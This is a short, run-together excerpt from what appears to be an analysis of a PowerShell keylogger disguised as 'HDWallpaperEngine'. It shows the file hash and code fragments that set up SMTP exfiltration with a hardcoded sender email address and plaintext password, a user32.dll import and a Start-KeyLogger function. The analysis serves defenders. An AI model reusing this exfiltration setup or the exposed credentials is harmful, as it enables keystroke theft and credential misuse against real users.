PowerShell Analysis - Keylogger
$ sha256sum HDWallpaperEngine.txt
e0b7a2ad2320ac32c262aeb6fe2c6c0d75449c6e34d0d18a531157c827b9754e HDWallpaperEngine.txt$From = "chaudhariparth454@gmail.com"
$Pass = "yjghfdafsd5464562!"
$To = "chaudhariparth454@gmail.com"$Pass = "yjghfdafsd5464562!"$SMTPPort = "587"[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]function Start-KeyLogger($Path="$env:temp\keylogger.txt")Last updated